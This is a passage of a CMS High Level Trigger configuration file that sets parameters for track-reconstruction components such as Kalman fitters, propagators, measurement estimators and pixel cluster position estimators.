ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPDetachedTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDisplacedDijethltPromptTrackCountingESProducer = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.1 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltESPDisplacedDijethltPromptTrackCountingESProducerLong = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.2 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltESPDisplacedDijethltTrackCounting2D1st = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.05 ),
useSignedImpactParameterSig = cms.bool( False ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 1 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPDisplacedDijethltTrackCounting2D2ndLong = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.2 ),
useSignedImpactParameterSig = cms.bool( True ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 2 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPDummyDetLayerGeometry = cms.ESProducer( "DetLayerGeometryESProducer",
ComponentName = cms.string( "hltESPDummyDetLayerGeometry" )
)
hltESPEcalTrigTowerConstituentsMapBuilder = cms.ESProducer( "EcalTrigTowerConstituentsMapBuilder",
MapFile = cms.untracked.string( "Geometry/EcalMapping/data/EndCap_TTMap.txt" )
)
hltESPElectronMaterialEffects = cms.ESProducer( "GsfMaterialEffectsESProducer",
BetheHeitlerParametrization = cms.string( "BetheHeitler_cdfmom_nC6_O5.par" ),
EnergyLossUpdator = cms.string( "GsfBetheHeitlerUpdator" ),
ComponentName = cms.string( "hltESPElectronMaterialEffects" ),
MultipleScatteringUpdator = cms.string( "MultipleScatteringUpdator" ),
Mass = cms.double( 5.11E-4 ),
BetheHeitlerCorrection = cms.int32( 2 )
)
hltESPFastSteppingHelixPropagatorAny = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPFastSteppingHelixPropagatorAny" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "anyDirection" ),
useTuningForL2Speed = cms.bool( True ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPFastSteppingHelixPropagatorOpposite = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPFastSteppingHelixPropagatorOpposite" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useTuningForL2Speed = cms.bool( True ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPFittingSmootherIT = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFittingSmootherIT" ),
Fitter = cms.string( "hltESPTrajectoryFitterRK" ),
Smoother = cms.string( "hltESPTrajectorySmootherRK" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPFittingSmootherRK = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFittingSmootherRK" ),
Fitter = cms.string( "hltESPTrajectoryFitterRK" ),
Smoother = cms.string( "hltESPTrajectorySmootherRK" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPFlexibleKFFittingSmoother = cms.ESProducer( "FlexibleKFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFlexibleKFFittingSmoother" ),
standardFitter = cms.string( "hltESPKFFittingSmootherWithOutliersRejectionAndRK" ),
looperFitter = cms.string( "hltESPKFFittingSmootherForLoopers" ),
appendToDataLabel = cms.string( "" )
)
hltESPFwdElectronPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPFwdElectronPropagator" ),
Mass = cms.double( 5.11E-4 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
hltESPGlobalDetLayerGeometry = cms.ESProducer( "GlobalDetLayerGeometryESProducer",
ComponentName = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPGlobalTrackingGeometryESProducer = cms.ESProducer( "GlobalTrackingGeometryESProducer" )
hltESPGsfElectronFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPGsfElectronFittingSmoother" ),
Fitter = cms.string( "hltESPGsfTrajectoryFitter" ),
Smoother = cms.string( "hltESPGsfTrajectorySmoother" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPGsfTrajectoryFitter = cms.ESProducer( "GsfTrajectoryFitterESProducer",
Merger = cms.string( "hltESPCloseComponentsMerger5D" ),
ComponentName = cms.string( "hltESPGsfTrajectoryFitter" ),
MaterialEffectsUpdator = cms.string( "hltESPElectronMaterialEffects" ),
GeometricalPropagator = cms.string( "hltESPAnalyticalPropagator" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPGsfTrajectorySmoother = cms.ESProducer( "GsfTrajectorySmootherESProducer",
Merger = cms.string( "hltESPCloseComponentsMerger5D" ),
ComponentName = cms.string( "hltESPGsfTrajectorySmoother" ),
MaterialEffectsUpdator = cms.string( "hltESPElectronMaterialEffects" ),
ErrorRescaling = cms.double( 100.0 ),
GeometricalPropagator = cms.string( "hltESPBwdAnalyticalPropagator" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPInitialStepChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPInitialStepChi2MeasurementEstimator36 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 36.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPInitialStepChi2MeasurementEstimator36" ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmoother" ),
Fitter = cms.string( "hltESPKFTrajectoryFitter" ),
Smoother = cms.string( "hltESPKFTrajectorySmoother" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherForL2Muon = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherForL2Muon" ),
Fitter = cms.string( "hltESPKFTrajectoryFitterForL2Muon" ),
Smoother = cms.string( "hltESPKFTrajectorySmootherForL2Muon" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherForLoopers = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherForLoopers" ),
Fitter = cms.string( "hltESPKFTrajectoryFitterForLoopers" ),
Smoother = cms.string( "hltESPKFTrajectorySmootherForLoopers" ),
EstimateCut = cms.double( 20.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -14.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherWithOutliersRejectionAndRK = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherWithOutliersRejectionAndRK" ),
Fitter = cms.string( "hltESPRKTrajectoryFitter" ),
Smoother = cms.string( "hltESPRKTrajectorySmoother" ),
EstimateCut = cms.double( 20.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -14.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitter" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitterForL2Muon = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitterForL2Muon" ),
Propagator = cms.string( "hltESPFastSteppingHelixPropagatorAny" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitterForLoopers = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitterForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmoother" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForL2Muon = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForL2Muon" ),
Propagator = cms.string( "hltESPFastSteppingHelixPropagatorOpposite" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForLoopers = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForMuonTrackLoader = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForMuonTrackLoader" ),
Propagator = cms.string( "hltESPSmartPropagatorAnyOpposite" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFUpdator = cms.ESProducer( "KFUpdatorESProducer",
ComponentName = cms.string( "hltESPKFUpdator" )
)
hltESPKullbackLeiblerDistance5D = cms.ESProducer( "DistanceBetweenComponentsESProducer5D",
ComponentName = cms.string( "hltESPKullbackLeiblerDistance5D" ),
DistanceMeasure = cms.string( "KullbackLeibler" )
)
hltESPL3MuKFTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPL3MuKFTrajectoryFitter" ),
Propagator = cms.string( "hltESPSmartPropagatorAny" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtQuadStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtQuadStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPLowPtStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMeasurementTracker = cms.ESProducer( "MeasurementTrackerESProducer",
ComponentName = cms.string( "hltESPMeasurementTracker" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
HitMatcher = cms.string( "StandardMatcher" ),
Phase2StripCPE = cms.string( "" ),
SiStripQualityLabel = cms.string( "" ),
UseStripModuleQualityDB = cms.bool( True ),
DebugStripModuleQualityDB = cms.untracked.bool( False ),
UseStripAPVFiberQualityDB = cms.bool( True ),
DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),
MaskBadAPVFibers = cms.bool( True ),
UseStripStripQualityDB = cms.bool( True ),
DebugStripStripQualityDB = cms.untracked.bool( False ),
badStripCuts = cms.PSet(
TOB = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TIB = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TID = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TEC = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
)
),
UsePixelModuleQualityDB = cms.bool( True ),
DebugPixelModuleQualityDB = cms.untracked.bool( False ),
UsePixelROCQualityDB = cms.bool( True ),
DebugPixelROCQualityDB = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
hltESPMixedStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPMixedStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPMixedStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPMixedStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMixedTripletStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPMixedTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPMixedTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMuonDetLayerGeometryESProducer = cms.ESProducer( "MuonDetLayerGeometryESProducer" )
hltESPMuonTransientTrackingRecHitBuilder = cms.ESProducer( "MuonTransientTrackingRecHitBuilderESProducer",
ComponentName = cms.string( "hltESPMuonTransientTrackingRecHitBuilder" )
)
hltESPPixelCPEGeneric = cms.ESProducer( "PixelCPEGenericESProducer",
LoadTemplatesFromDB = cms.bool( True ),
Alpha2Order = cms.bool( True ),
ClusterProbComputationFlag = cms.int32( 0 ),
useLAWidthFromDB = cms.bool( False ),
lAOffset = cms.double( 0.0 ),
lAWidthBPix = cms.double( 0.0 ),
lAWidthFPix = cms.double( 0.0 ),
doLorentzFromAlignment = cms.bool( False ),
useLAFromDB = cms.bool( True ),
xerr_barrel_l1 = cms.vdouble( 0.00115, 0.0012, 8.8E-4 ),
yerr_barrel_l1 = cms.vdouble( 0.00375, 0.0023, 0.0025, 0.0025, 0.0023, 0.0023, 0.0021, 0.0021, 0.0024 ),
xerr_barrel_ln = cms.vdouble( 0.00115, 0.0012, 8.8E-4 ),
yerr_barrel_ln = cms.vdouble( 0.00375, 0.0023, 0.0025, 0.0025, 0.0023, 0.0023, 0.0021, 0.0021, 0.0024 ),
xerr_endcap = cms.vdouble( 0.002, 0.002 ),
yerr_endcap = cms.vdouble( 0.0021 ),
xerr_barrel_l1_def = cms.double( 0.0103 ),
yerr_barrel_l1_def = cms.double( 0.0021 ),
xerr_barrel_ln_def = cms.double( 0.0103 ),
yerr_barrel_ln_def = cms.double( 0.0021 ),
xerr_endcap_def = cms.double( 0.002 ),
yerr_endcap_def = cms.double( 7.5E-4 ),
eff_charge_cut_highX = cms.double( 1.0 ),
eff_charge_cut_highY = cms.double( 1.0 ),
eff_charge_cut_lowX = cms.double( 0.0 ),
eff_charge_cut_lowY = cms.double( 0.0 ),
size_cutX = cms.double( 3.0 ),
size_cutY = cms.double( 3.0 ),
EdgeClusterErrorX = cms.double( 50.0 ),
EdgeClusterErrorY = cms.double( 85.0 ),
inflate_errors = cms.bool( False ),
inflate_all_errors_no_trk_angle = cms.bool( False ),
NoTemplateErrorsWhenNoTrkAngles = cms.bool( False ),
UseErrorsFromTemplates = cms.bool( True ),
TruncatePixelCharge = cms.bool( True ),
IrradiationBiasCorrection = cms.bool( True ),
DoCosmics = cms.bool( False ),
Upgrade = cms.bool( False ),
SmallPitch = cms.bool( False ),
ComponentName = cms.string( "hltESPPixelCPEGeneric" ),
MagneticFieldRecord = cms.ESInputTag( "","" ),
appendToDataLabel = cms.string( "" )
)
